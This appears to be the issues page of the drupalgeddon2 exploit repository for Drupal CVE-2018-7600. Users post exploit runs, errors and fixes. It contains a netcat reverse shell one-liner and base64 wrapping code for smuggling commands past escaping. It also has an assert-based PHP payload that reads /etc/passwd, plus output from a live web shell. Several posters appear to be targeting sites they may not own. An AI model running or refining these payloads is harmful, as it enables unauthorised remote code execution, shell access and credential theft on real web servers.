dreadlocked / drupalgeddon2
Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)
FIXED
Whenever it writes here, something is just wrong.
In Drupal 7.37 there are form_id and form_build_id, so why is the vulnerability not available?
gogu@GoguSclipici:~/dld/1$ ruby drupalgeddon2-customizable-beta.rb https://192.168.1.10/ 7 "ps x" "system" "1"
Requesting: 192.168.1.10//user/password/?name[%23post_render][]=system&name[%23markup]=ps%20x&name[%23type]=markup
POST: form_id=user_pass&_triggering_element_name=name
302
drupalgeddon2-customizable-beta.rb:86:in `get_form_build_id': undefined method `[]' for nil:NilClass (NoMethodError)
from drupalgeddon2-customizable-beta.rb:115:in `exploit'
from drupalgeddon2-customizable-beta.rb:167:in `<main>'
gogu@GoguSclipici:~/dld/1$ ruby drupalgeddon2-customizable-beta.rb https://192.168.1.10/ 7 "ps x" "system" "0"
Requesting: 192.168.1.10//user/password/?name[%23post_render][]=system&name[%23markup]=ps%20x&name[%23type]=markup
POST: form_id=user_pass&_triggering_element_name=name
302
drupalgeddon2-customizable-beta.rb:86:in `get_form_build_id': undefined method `[]' for nil:NilClass (NoMethodError)
from drupalgeddon2-customizable-beta.rb:115:in `exploit'
from drupalgeddon2-customizable-beta.rb:167:in `<main>'
No matter what I choose, it still uses /user/password.
If I don't put any 4th argument it runs fine with /?q=user/password&name
Hello guys, just wanted to thank you for porting the exploit to Ruby. I've added the exploit with some quick modifications to the CVE-in-Ruby repository here. All rights have been reserved to you.
I've added a Readline loop just to make interacting with the uploaded shell possible from the same exploit.
[*] --==[::#Drupalggedon2::]==--
[+] Target seems to be exploitable! w00hooOO!
[+] PHP shell: http://172.17.0.2/s.php?c=CMD
[+] Type your commands (exit to exit) and press Enter!
Drupalgeddon2-> whoami
www-data
Drupalgeddon2-> pwd
/var/www/html
Drupalgeddon2->
Please let me know if you have an issue with that; if so, I can rewrite the exploit again.
Appreciate your efforts, guys.
drupalgeddon2.1.rb:86:in `exploit': undefined method `[]' for nil:NilClass (NoMethodError)
	from drupalgeddon2.1.rb:125:in `
Hi!
When I try to use this exploit on a few sites, I get the error:
Didn't detect any output (disabled PHP function?)
Why?
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[i] Target : http://EXAMPLE.ru/
--------------------------------------------------------------------------------
[+] Found : http://EXAMPLE.ru/CHANGELOG.txt (HTTP Response: 200)
[+] Drupal!: v7.54
--------------------------------------------------------------------------------
[*] Testing: Code Execution
[i] Payload: echo NNWXFZNT
[!] WARNING: Target might to be exploitable [2]... Didn't detect any output (disabled PHP function?)
drupalgeddon2.rb:147:in `<main>': undefined method `strip' for nil:NilClass (NoMethodError)
Hi,
After the recent update, the script is failing to identify the version of Drupal.
[!] MISSING: https://example.com/CHANGELOG.txt (405)
But in fact the https://example.com/CHANGELOG.txt
file is present and also gives HTTP 200.
Hi!
I'm sure you heard about the big news regarding another security hole prone to RCE against Drupal 7.X & 8.X. I was wondering if you plan on adding support for this bug in this PoC?
References;
https://www.drupal.org/sa-core-2018-004
https://www.bleepingcomputer.com/news/security/hackers-dont-give-site-owners-time-to-patch-start-exploiting-new-drupal-flaw-within-hours/
Hi !
Thanks for sharing those PoCs with the community :) I was wondering if you know how to exploit Drupal 6.*?
So far;
Drupal 7 is with /user/password
Drupal 8 is with /user/register
Thanks!
If any of the URLs requested in order to guess the Drupal version returns 200, the iteration stops (break), even when the response body does not actually allow the version to be determined.
Therefore, the next URLs are never checked.
I have tested it against Drupal version 8.5.0 (but it should be applicable to all supported versions).
I was trying to get a reverse shell using the exploit with the payload rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.16 443 >/tmp/f
which failed due to it not being escaped and some URL-encoding problems.
I have fixed the issue by encoding the user payload to base64 and then URL-encoding it; this lets the payload be delivered successfully without any kind of escaping having to be done on our end.
# Encoding for better Code Execution - @m4lv0id
require 'base64'
require 'erb'

# Wrap the user's command so quotes, pipes and redirects never appear raw
# in the request: base64 it, let the target decode and pipe it into sh,
# then percent-encode the wrapper for the query string.
command = "echo " + Base64.strict_encode64(command) + " | base64 -d | sh"
# URI::encode was removed in Ruby 3.0; ERB::Util.url_encode percent-encodes
# every byte outside [A-Za-z0-9_.~-], so base64's '+' becomes %2B and the
# separate gsub('+', '%2b') that URI::encode needed is no longer required.
command = ERB::Util.url_encode(command)
puts "Command : #{command}"
Feel free to add these lines to the exploit and you're good to go. :)
It doesn't work on Drupal 6; any idea how to adapt this exploit? Normally it is also vulnerable.
Thx
Target: Drupal 7.31
[!] FAILED: Coudn't find writeable web path
[*] Dropping back direct commands (expect an ugly shell!)
drupalgeddon2>> whoami
[{"command":"settings","settings":{"basePath":"/","pathPrefix":"","ajaxPageState":{"theme":"ita_members","theme_token":"RISro4XrxuW9kMvaaHHLKNxEu6YecYzfpzRPGhXbhpI"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C/span\u003E","settings":{"basePath":"/","pathPrefix":"","ajaxPageState":{"theme":"ita_members","theme_token":"RISro4XrxuW9kMvaaHHLKNxEu6YecYzfpzRPGhXbhpI"}}}]
[*] Testing: Code Execution (Method: name)
[i] Payload: echo ZLUKVHEH
/usr/lib/ruby/3.1.0/socket.rb:452:in `__read_nonblock': Connection reset by peer (Errno::ECONNRESET)
	from /usr/lib/ruby/3.1.0/socket.rb:452:in `read_nonblock'
	from /usr/lib/ruby/3.1.0/net/protocol.rb:212:in `rbuf_fill'
	from /usr/lib/ruby/3.1.0/net/protocol.rb:193:in `readuntil'
	from /usr/lib/ruby/3.1.0/net/protocol.rb:203:in `readline'
	from /usr/lib/ruby/3.1.0/net/http/response.rb:42:in `read_status_line'
	from /usr/lib/ruby/3.1.0/net/http/response.rb:31:in `read_new'
	from /usr/lib/ruby/3.1.0/net/http.rb:1575:in `block in transport_request'
	from /usr/lib/ruby/3.1.0/net/http.rb:1566:in `catch'
	from /usr/lib/ruby/3.1.0/net/http.rb:1566:in `transport_request'
	from /usr/lib/ruby/3.1.0/net/http.rb:1539:in `request'
	from /usr/lib/ruby/3.1.0/net/http.rb:1532:in `block in request'
	from /usr/lib/ruby/3.1.0/net/http.rb:966:in `start'
	from /usr/lib/ruby/3.1.0/net/http.rb:1530:in `request'
	from drupalgeddon2.rb:53:in `http_request'
	from drupalgeddon2.rb:96:in `gen_evil_url'
	from drupalgeddon2.rb:475:in `block in <main>'
	from drupalgeddon2.rb:467:in `each'
	from drupalgeddon2.rb:467:in `
When I manually check through the browser https://**************.org/CHANGELOG.txt I can see it. But via the script it says CHANGELOG.txt is missing and forces the D8 exploit.
It seems like drupalgeddon2 can't work properly when testing on an insecure URL.
Support for exploiting a website protected by authentication
On some hosts I get this:
/usr/lib/ruby/2.3.0/net/http.rb:1561:in `addr_port': undefined method `+' for nil:NilClass (NoMethodError)
I can't figure out what this error relates to.
Anyone have any idea?
I deployed a fresh install of "drupal-8.3.5" and I'm trying to use the "drupalgeddon2-not-write-shell.rb" version of the exploit.
I run the exploit with the following parameters:
ruby drupalgeddon2-not-write-shell.rb <ip_address> id passthru 1
The output says that the target seems to be exploitable, but I'm not receiving anything back.
Did I miss something?
Thanks.
Traceback (most recent call last):
	2: from drupalgeddon2.rb:16:in `<main>'
	1: from /usr/local/lib/site_ruby/2.5.0/rubygems/core_ext/kernel_require.rb:54:in `require'
/usr/local/lib/site_ruby/2.5.0/rubygems/core_ext/kernel_require.rb:54:in `require': cannot load such file -- highline/import (LoadError)
Hi!
Instead of using exec or passthru it is far better to use assert, so you can eval custom PHP code. This way you can avoid disable_functions issues :).
Example of a valid payload:
{'q':'user/password', 'name[0][#post_render][]':'assert', 'name[0][#markup]': $COMMAND . ' !== "X-C3LL";', 'name[0][#type]':'markup'}
So you can do things like:
{'q':'user/password', 'name[0][#post_render][]':'assert', 'name[0][#markup]':'readfile("/etc/passwd") !== "X-C3LL";', 'name[0][#type]':'markup'}
Hi,
#attack machine
kali 2020_03 full updated
#target
OS: Windows
webserver: IIS8.5
Drupal v7.54
https://www.local.com/CHANGELOG.txt
Tried with 'try_phpshell = true' and 'try_phpshell = false'; not running.
Any ideas I could try?
[*] Testing: Form (user/password)
[+] Result : Form valid
[*] Testing: Code Execution (Method: name)
[i] Payload: echo EOLRQNNO
Traceback (most recent call last):
	7: from drupalgeddon2.rb:463:in `<main>'
	6: from drupalgeddon2.rb:463:in `each'
	5: from drupalgeddon2.rb:473:in `block in <main>'
	4: from drupalgeddon2.rb:44:in `http_request'
	3: from /usr/lib/ruby/2.7.0/uri/common.rb:737:in `URI'
	2: from /usr/lib/ruby/2.7.0/uri/common.rb:234:in `parse'
	1: from /usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:73:in `parse'
/usr/lib/ruby/2.7.0/uri/rfc3986_parser.rb:21:in `split': URI must be ascii only "https://www.local.com/?q=file/ajax/name/%23value/form-2sKgFeXBW8q3Ukw1XT7U6wHkN_RxDjP0zcrXhWGxt68\\" /><input type=\"hidden\" name=\"form_id\" value=\"search_block_form\" /><div style=\"clear:both\"><div class=\"block-sep\"><div id=\"navigation\" role=\"navigation\" class=\"clearfix\"><div class=\"constrain\"><div id=\"nav-left\"><div id=\"nav-right\"><ul id=\"navmenu\" class=\"sf-menu sf-js-enabled sf-shadow\">
Traceback (most recent call last):
File "/usr/local/bin/olevba", line 33, in
sys.exit(load_entry_point('oletools==0.60.1.dev2', 'console_scripts', 'olevba')())
File "/usr/local/bin/olevba", line 25, in importlib_load_entry_point
return next(matches).load()
File "/usr/local/lib/python3.9/importlib/metadata.py", line 77, in load
module = import_module(match.group('module'))
File "/usr/local/lib/python3.9/importlib/init.py", line 127, in import_module
return _bootstrap._gcd_import(name[level:], package, level)
File "", line 1030, in _gcd_import
File "", line 1007, in _find_and_load
File "", line 986, in _find_and_load_unlocked
File "", line 680, in _load_unlocked
File "", line 790, in exec_module
File "", line 228, in _call_with_frames_removed
File "/usr/local/lib/python3.9/site-packages/oletools-0.60.1.dev2-py3.9.egg/oletools/olevba.py", line 307, in
import colorclass
ModuleNotFoundError: No module named 'colorclass'
Hi,
Tested this on 8.4.5 / 8.5.0 and exploit fails every time
3 different VMs with RHEL7 / PHP7
[!] Exploit FAILED ~ Response: 404
Thanks
Hey, I've tested it on 8.4.5, 8.3.7 and it works.
However, it fails on 7.5.5.
user@debian:~/drupwn/testpwn$ ruby drupalgeddon2.rb https://testsite whoami
[+] Target seems to be exploitable! w00hooOO!
/usr/lib/ruby/2.3.0/json/common.rb:156:in `parse': 784: unexpected token at '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN"
  "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">' (JSON::ParserError)
And after this goes just plain drupal html.
Traceback (most recent call last):
	2: from drupalgeddon2.rb:16:in `<main>'
	1: from /usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require'
/usr/lib/ruby/2.5.0/rubygems/core_ext/kernel_require.rb:59:in `require': cannot load such file -- highline/import (LoadError)
Hi!
Thank you for sharing this PoC! It works like a charm on my 7.28 and 7.56.
However, on a 7.9 site I only get
[*] --==[::#Drupalggedon2::]==--
--------------------------------------------------------------------------------
[*] Target : http://xxxxx/
--------------------------------------------------------------------------------
[!] MISSING: http://xxxxx/CHANGELOG.txt (404)
[!] MISSING: http://xxxxx/core/CHANGELOG.txt (404)
[+] Found : http://xxxxx/includes/bootstrap.inc (200)
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] Testing: Code Execution
[*] Payload: echo TZPPOZNH
[!] Unsupported Drupal version
Obviously, the exploit encounters some problems while determining the Drupal version.
Earlier versions of the exploit respond with
*nothing interesting above, I think*
[+] Drupal!: can detect a matching directory
--------------------------------------------------------------------------------
[*] PHP cmd: passthru
--------------------------------------------------------------------------------
[+] Target seems to be exploitable! w00hooOO!
[+] Result: *lots of html code of http://xxxxx/?q=user/password/*
--------------------------------------------------------------------------------
[*] curl 'http://xxxxx/s.php' -d 'c=whoami'
--------------------------------------------------------------------------------
[!] Exploit FAILED ~ Response: 404
I would appreciate any help getting this exploit to work.
Thanks in advance.
Regards,
kill-20
Thank you guys for this exploit.
I was trying to make this work with the user/password form instead of user/login (disabled):
[{"command":"settings","settings":{"basePath":"/drupal-7.43/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"ujFkz760YMJYxE-x5scsgNLjtT8tG0d6YB_gCizLJ-U"}},"merge":true},{"command":"insert","method":"replaceWith","selector":null,"data":"\u003Cdiv class=\u0022messages error\u0022\u003E\n\u003Ch2 class=\u0022element-invisible\u0022\u003EError message\u003C/h2\u003E\n \u003Cul\u003E\n \u003Cli\u003E\u003Cem class=\u0022placeholder\u0022\u003ENotice\u003C/em\u003E: Undefined index: #value in \u003Cem class=\u0022placeholder\u0022\u003Efile_ajax_upload()\u003C/em\u003E (line \u003Cem class=\u0022placeholder\u0022\u003E262\u003C/em\u003E of \u003Cem class=\u0022placeholder\u0022\u003EC:\xampp\htdocs\drupal-7.43\modules\file\file.module\u003C/em\u003E).\u003C/li\u003E\n \u003Cli\u003E\u003Cem class=\u0022placeholder\u0022\u003ENotice\u003C/em\u003E: Undefined index: #suffix in \u003Cem class=\u0022placeholder\u0022\u003Efile_ajax_upload()\u003C/em\u003E (line \u003Cem class=\u0022placeholder\u0022\u003E280\u003C/em\u003E of \u003Cem class=\u0022placeholder\u0022\u003EC:\xampp\htdocs\drupal-7.43\modules\file\file.module\u003C/em\u003E).\u003C/li\u003E\n \u003C/ul\u003E\n\u003C/div\u003E\n\u003Cspan class=\u0022ajax-new-content\u0022\u003E\u003C/span\u003E","settings":{"basePath":"/drupal-7.43/","pathPrefix":"","ajaxPageState":{"theme":"bartik","theme_token":"ujFkz760YMJYxE-x5scsgNLjtT8tG0d6YB_gCizLJ-U"}}}]
I also changed the form_id; I think the problem was with _triggering_element_name.
Well, drupalgeddon2.rb said the shell is written in the root dir:
[i] Fake shell: curl 'https://site.com/user/password/s.php' -d 'c=hostname'
but it doesn't execute the command; it just hangs my terminal.
see the screenshot :(
Hi, I have this error in blackarch (archlinux):
drupalgeddon2.rb:131:in `<main>': undefined local variable or method `http' for main:Object (NameError)
Currently the verbosity level is hard-coded. It would be useful to control it via command-line argument.
First of all- great tool, thanks!
I'm getting a weird result when checking a site that runs Drupal v8.x:
Drupalgeddon result-
[+] Found : https://xxxxx/CHANGELOG.txt (HTTP Response: 200)
[!] WARNING: Could be a false-positive [1-1], as the file could be reported to be missing
[!] WARNING: Unable to detect keyword 'drupal.org'
[+] Found : https://xxxxx/core/CHANGELOG.txt (HTTP Response: 200)
[+] Found : https://xxxxx/includes/bootstrap.inc (HTTP Response: 200)
[+] Found : https://xxxxx/core/includes/bootstrap.inc (HTTP Response: 403)
[+] Found : https://xxxxx/includes/database.inc (HTTP Response: 200)
[+] Drupal?: v6.x
[-] Unsupported Drupal version (6.x)
I've tried running the customizable script, returns an error:
"drupalgeddon2-customizable-beta.rb:69:in `+': no implicit conversion of nil into String (TypeError)"
Any ideas?
Hi dear.
I have a target site with an old Drupal 7. I was sure your script would do its work, but please see the output below.
Can you help?
[*] Testing: Code Execution
[i] Payload: echo VXAPFBDO
[!] WARNING: Didn't detect form_build_id
[!] Target is NOT exploitable ~ HTTP Response: 302
Please provide Drupal 6.x possible exploit parameters.